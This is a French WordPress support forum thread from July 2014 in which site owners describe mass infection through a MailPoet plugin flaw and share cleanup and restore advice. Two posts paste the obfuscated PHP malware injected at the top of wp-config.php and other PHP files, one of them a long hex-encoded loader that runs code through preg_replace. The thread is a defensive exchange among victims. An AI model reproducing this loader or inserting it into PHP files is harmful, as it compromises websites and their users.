- Statut : non résolu
- Ce sujet contient 89 réponses, 23 participants et a été mis à jour pour la dernière fois par Anonyme, le il y a 10 années.
-
AuteurMessages
-
19 juillet 2014 à 9 h 53 min #539864
Bonjour,
Wysija Mailpoet comporte une faille de sécurité. Beaucoup de sites ont été hackés et les hébergeurs bloquent l’accès tant que les fichiers impactés n’ont pas été remplacés. Une mise à jour récente du plugin a été effectuée pour parer au problème.
Cela pourra peut-être aider tous ceux qui ne peuvent plus accéder à leur site.19 juillet 2014 à 10 h 18 min #961474Alors, c’est la joie ce matin sur nos WP…
Le mien semble tourner normalement, mais impossible de me connecter à l’admin (/wp-config/ ou wp-login), j’ai une erreur 500 / page blanche. Je n’ai pas trouvé de soluce pour l’instant, même tous les dossiers de plugins renommés.
Ma chérie a perdu tous ses plugins quand on a voulu accéder à la page de mise à jour des extensions :
L’extension akismet/akismet.php a été désactivée suite à l’erreur : Cette extension ne dispose pas d’un en-tête valide.
L’extension all-in-one-schemaorg-rich-snippets/index.php a été désactivée suite à l’erreur : Cette extension ne dispose pas d’un en-tête valide.
…J’ai trouvé à la 1ere ligne de tous nous WP-CONFIG.PHP ça :
<?php $mldkhjidf = 'f35.)1%x5c%x782f14+9**-)1Rb%x5c%x7825))!gj!<*#cd2bge56+99%x5c%…..
(16 Ko de texte).
Je continue de lire tous les sujets du forum qui parlent de chack depuis hier, sans soluce pour l’instant.
Nos backups ne sont pas à jour.youpi.
19 juillet 2014 à 10 h 39 min #961475J’utilise WinMerge (gratuit, dispo sur http://sourceforge.net/projects/winmerge/ ) et plusieurs fichiers PHP de la racine ont une ligne de ce genre en début de fichier…
J’imagine que c’est du code malveillant chiffré…
19 juillet 2014 à 10 h 55 min #961476Tous les fichier PHP sont modifiés…
19 juillet 2014 à 11 h 41 min #961477Wysija Mailpoet comporte une faille de sécurité.
La faille de sécurité date du début du mois… À moins que ce soit une nouvelle faille ?!? Quelle était la version utilisée ?
Je continue de lire tous les sujets du forum qui parlent de hack depuis hier, sans soluce pour l’instant.
Les correctifs ont été publié le 1er et le 4 juillet dernier, il faut au minimum la version 2.6.8 de l’extension.
La solution est de remettre en place une sauvegarde saine du site et de mettre à jour l’extension avec une version sûre.19 juillet 2014 à 12 h 06 min #961478Nous n’avons pas de backup à jour des fichiers (toutes les nuits pour la DB).
Donc on nettoie.Un seul WP possède ce plugin, c’est remonté dans tout le FTP, tous les WP sont touchés, même les fichiers PHP d’un site d’ecommerce (en dev, pas en prod).
19 juillet 2014 à 12 h 33 min #961479Nous n’avons pas de backup à jour des fichiers (toutes les nuits pour la DB).
Donc on nettoie.Après il faut voir avec son hébergeur, certains proposent par défaut des snapshots ou des sauvegardes sur quelques jours… Cela peut être suffisant.
Sans sauvegarde, il n’y a pas d’autres choix que de tout nettoyer.19 juillet 2014 à 12 h 42 min #961480fge, la dernière mise à jour date du 15/7/2014 et c’est la version 2.6.9.
19 juillet 2014 à 12 h 59 min #961481fge, la dernière mise à jour date du 15/7/2014 et c’est la version 2.6.9.
Oui… Il n’y a pas eu de mise à jour depuis. Tu veux dire que l’infection du site a eu lieu avec la version 2.6.9 avec une nouvelle faille ? En principe les versions 2.6.7 & 2.6.8 corrigeaient les 2 failles de sécurité identifiées…
19 juillet 2014 à 13 h 16 min #961482hello, même problème sur un site. j’ai trouvé ça dans wp-config :
<?php $xujoadcqsl = 'Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgojc%x7825))!gj!2<!%x5c%x7825ww2)%x5x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-ix7825m%x5c%x78259y]g2y]#>>*4-1-bubE{h]y6g]257]y86]267]y74]275]y7:]268]y7f#!%x5c%x782400~:>2*!%x5c%x7825z>3>%x5c%x7822!ptcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5x65″, »%x65%166%x61%154%x28%151x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5ct0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x75c%x7825G]y6d]281Ld]245]K2]285A%x5c%x78272qj%x5c%x78256<^#x7825s%x5c%x7825<#4%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%UI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%u%x5c%x7825V%x5c%x785c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufh6]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:51]y35]256]y76]72]y3d]51]y35]274]y4:]82]2]y76]62]y3:]84#-!OVMM*<%x22%51%,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%145c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QU&;!osvufs}%x5c%x787f;!opjudo-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]85c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825jc%x7860{6~6<tfs%x5c%x782%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!}5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7g252]y83]273]y72]282#!#]y8425)ppde>u%x5c%x7825V1<%x5c%x7825j=tj{fpg)%x5c%x7825%x%x5c%x78223}!+!<+{e%x5c%x7825+*!25q%x5c%x7825V<*#fopoV;hojepdoF.uofc%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%%x5c%x7825!qp%x5c%x7825%x5c%x7827Y%x5c%x7825<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x78)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%xnui}&;zepc}A;~!}%x5c%%x7824-%x5c%x7824y7%82f7&6|7**111127-K)ebfsX%x5cw6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%|!*1?hmg%x5c%x7825)!gj!j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sux29%51%x29%73", NULL); }%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5cdR6U<#16,47R57,27R66,#%x5c%x782825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x7825c%x7825!|Z~!!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x!bssbz)%x5c%x7824]25%x5c6%x61″])))) { $GLOBALS[« %x61%156%x75%156%x61 »]=1%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mgoj{hA!osvufs!~j%x5c%x7825!*3!%x5c%x7827!hmg%x5c<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787f%x5c%x7825!j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]j6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k24!#]y81]227,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5hh%x5c%x7825_t%x5c%x7825:o%x5c%x7825)Rd%x5c%x7825)Rb%x5vg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*sb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp5c%x7825j:^Ew:Qb:Qc:W~!%x5cx7822)gj!|!*nbsbq%x5c%x7825)323ldf7rfs%x5c%x78256~6<%x5c%x787fw6>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%!>!%x5c%x7825tdz)%x5c%x6d%x5c%x7825)!gj}Z;h!opjudovg}{;#}#-%x5c%x7825o:W%x5cw6*%x5c%x787f_*#fmjgk4%x572]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]2f7rfs%x5c%x78256<#o]1%x5c%x7nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x75%x5c%x787f!~!!2p%x5c%x7825Z!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%xx5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)mpqsut>j%x5c%x7825!*762]47y]252]18y]#>q%x5c%if((function_exists(« %x6f%142%x5f%163%x74%141%x72%164 ») && (%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tx7825tmw)%x5c%x7825tww*#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)d%x5c%x7825)uqpuft%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e5c%x7825b:%x5c%x7825s:%x5c%x785c%x]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%D4]82]K6]72]K9]78]K5]53]Kc#!#]D6M7]K3#<%x5c%x7825y%x5c%x785cq%x5c%x782]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]4!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5cx787f;!|!}{;)gj}l;33bq}k;opjudovg}%x573]y76]271]y7d]252]y74]256#111#L4]275L3]24824!%x5c%x78242178}527}88:}334}472%x5c%x78x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gp7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)#%171%x5f%155%x61%160%x28%42%x66%152!isset($GLOBALS["%x61%156%x75%15b%x5c%x7825!*##>>X)!gjZb%x5c%x7825!**X)ufttj%x5c%y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782f)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x78osvufs!|ftmf!~<**9.-reporting(0); preg_replace(bj+upcotn+qsvmt+fmhpph#)zbs]275]y83]248]y83]256]y81]265]2]3]364]6]283]427]36]373P6]36]73]83c%x7824!#]y76]277]yc%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gx7825j>1#p824tvctus)%x5c%x7825%x5c%x787827tfs%x5c%x78256<*17-SFEBFI,6!2p%x5c%x7825!*3>?*2bx7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x78255c%x7824-%x5c%x7824*!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%xsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5cidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)]y83]273]y76]277##]y74]273]y76]252]y85]256860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x#-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)#x5c%x7878r.985:52985-t.98]K4]65]D8]8c%x787f%x5c%x787f%x5c%x787f>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x8257-K)fujs%x5c%x7878X6%x5c%x785c%x7860opjudovg%x5c%x7822)!gj}1~!2q%x5c%x782!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5cx5c%x7825:!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u>%x5c%x7%x5c%x7825)gpf{jt)!gj!2b7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmb27{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x78x7825%x5c%x787f!b%x5c%x7825Z25tzw%x5c%x782f%x5c%x7824)#P#-82f20QUUI7jsv%x5c%x78257UFH#%x5c%x78278:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78ec%x7827{**u%x5c%x7825-#j%x5c%x7825)sutcvt)!gj!|!*bubE{h%K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-N"%x2f%50%x2e%52%x29%57%%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x57**^#zsfvr#%x5c%x785cq%x5c%x782573]y76]258]y6g]273]y76]271]y7d]252]y74]256#^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256^#zsfvr#h%x5c%x7825)n%x5c%x7825-#+I#)qQi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!%x66%147%x67%42%x2c%163%x74%162%x5f%1636]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y45]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*W%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x527-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR*WYsboepn)%x5c%x7825bss-svufs:~:%x5c%x782fh%c6f+9f5d816:+946:ce44#)zbssby3:]62]y4c#!%x5c%x7824Ypp3)%x5c%x7825cB%xdf)%x5c%x7825%x5c%x7824-%x5cef)#%x5c%x7824*!#]y3d]%x7825z!>2.%x5c%x7825!%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#c%x785c%x5c%x7825j:.2^,%xx7825ggg!>!#]y81]273]y76]258]y6g]2fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^6%x21%76%x21%50%x5c%x7825%x5c%x78%x5c%x7825=*h%x5c%x7825)m%x5c%x7r.984:75983:48984:71]K9]77]825):fmji%x5c%x7878::h%x5c%x7825:n%x5c%)hopm3qjA)qj3hopmA%x]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*%x)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x56|6.7eu{66~67<&w6#]D6]281L1#%x5c%x782f#M5]DgP5]D6##]D4]27378257>%x5c%x782272qj%x5c%x7825)7gj6hmg%x5c%x7825!j%x5c%x7825!|!*#91y]cx5c%x7825r%x5c%x7878<~!!%x5c%x7825s:Nx5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%xq%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6>1*!%x5c%x7825b:>1%x5c%x7825s:%x5!fyqmp%x7827pd%x5c%x78256<pd%x5c%x7#Qtpz)#]341]88M4P8]37]278]225]241]334]368]32y72]254]y76#!#]y84]275opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x78255w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6>}R;msv}.;%x5c%%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604{h1:|:*mmvo:>:iuhofm5c%x7825fdy<Cb*[%x5c%x7825h!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78L3P6L1M5]D2P4]D6#<%x/(.*)/epreg_replaceuaynofvtpf'; $uzgjuofhyt = explode(chr((190-146)),'4625,60,5676,32,3125,48,9459,52,5952,27,7658,23,641,30,2718,44,5641,35,7963,39,1350,49,8752,33,7513,42,6463,66,1399,63,5148,61,9616,29,2961,68,9027,60,7169,69,2528,28,10025,60,6860,57,4326,29,7476,37,3947,65,7611,47,1953,32,6669,49,9214,51,8904,20,1050,46,859,28,2369,54,7816,63,5014,20,7740,33,8989,38,2229,29,4166,24,9394,65,2556,63,3278,42,4242,25,1746,24,9780,56,2876,29,6234,34,8190,63,7681,59,1834,38,3491,47,4012,67,6303,49,213,54,4800,21,6105,61,528,68,4190,32,2310,59,5932,20,5373,40,3215,63,4685,52,4582,20,6986,50,3388,59,2841,35,2762,55,596,45,502,26,2666,52,9265,45,311,21,7579,32,9347,47,6917,46,4393,46,6268,35,7238,65,3320,43,5819,60,8540,47,2258,52,3564,69,2181,48,3029,55,9087,69,5979,27,3797,54,9973,52,3658,29,119,30,8327,28,7109,60,1462,69,994,36,7415,31,5708,63,3913,34,6570,42,8690,62,4355,38,9836,42,671,40,1770,64,1531,28,3687,59,54,65,9926,20,9878,48,2032,32,3363,25,9727,53,6819,41,422,20,6791,28,1030,20,7355,60,1915,38,2905,56,6963,23,2064,54,8501,39,5413,50,3173,42,2487,21,5209,37,442,21,7555,24,711,68,8129,61,6070,35,4267,59,1872,43,6006,29,9689,38,6612,57,332,70,3633,25,8277,50,7083,26,5771,48,7879,30,4540,42,8785,32,8844,60,887,47,4602,23,267,44,779,50,5488,58,3538,26,7773,43,3084,41,3746,51,5084,64,6206,28,4439,70,7303,52,8413,28,7036,47,1704,42,1275,39,2508,20,5546,46,1985,47,6408,55,9565,51,8441,39,1203,40,8355,58,1656,48,7909,54,0,54,6352,56,402,20,4509,31,8587,44,1559,36,2423,64,2619,47,4737,23,8253,24,3447,44,4079,64,6755,36,1096,56,8817,27,4948,66,9156,58,4911,37,5463,25,10085,21,829,30,8924,65,9946,27,4143,23,5592,49,6718,37,9645,44,6035,35,5034,50,8072,57,6529,41,934,60,9310,37,4222,20,5313,60,1152,51,9511,54,8631,25,4862,49,3851,62,8480,21,6166,40,4760,40,463,39,184,29,4821,41,5879,53,7446,30,149,35,1314,36,2118,63,8656,34,5246,67,8002,70,1595,61,1243,32,2817,24'); $ksorobmbhj=substr($xujoadcqsl,(31834-21728),(26-19)); if (!function_exists('qmpunefjof')) { function qmpunefjof($vaxzpsvdsb, $gpzgyujzry) { $wohuhchapd = NULL; for($gmuyoukepq=0;$gmuyoukepq
c’est rassurant…
19 juillet 2014 à 13 h 21 min #961483+1 JeyC :tous les fichiers php sont touché… super !
19 juillet 2014 à 13 h 27 min #961484Non, fge, je pense que l’attaque a eu lieu sur la version 2.6.8. et que la faille a été corrigée sur la 2.6.9. Enfin, espérons…
19 juillet 2014 à 13 h 49 min #961485Bonjour, j’ai le même problème, je croise les doigts pour que mon hébergeur 1&1 puisse effectuer une restauration…
19 juillet 2014 à 14 h 00 min #961486Demo Wp, tu peux restaurer tes fichiers toi-même sur ton espace client 1&1.
19 juillet 2014 à 14 h 07 min #961487J’ai téléchargé tout le contenu de mes sites en local.
J’utilise TexRep (gratuit) pour remplacer automatiquement dans tous les fichiers la fameuse ligne contenue dans TOUS les *PHP* de façon automatique. Puis je re-upload les fichiers.
On a retrouvé nos extensions (mais moi, j’ai tjs ma page blanche quand je tente de me loguer (/wp-admin) (erreur 500).
-
AuteurMessages
- Le sujet ‘Alerte à tous ceux qui ne peuvent plus accéder à leur site’ est fermé à de nouvelles réponses.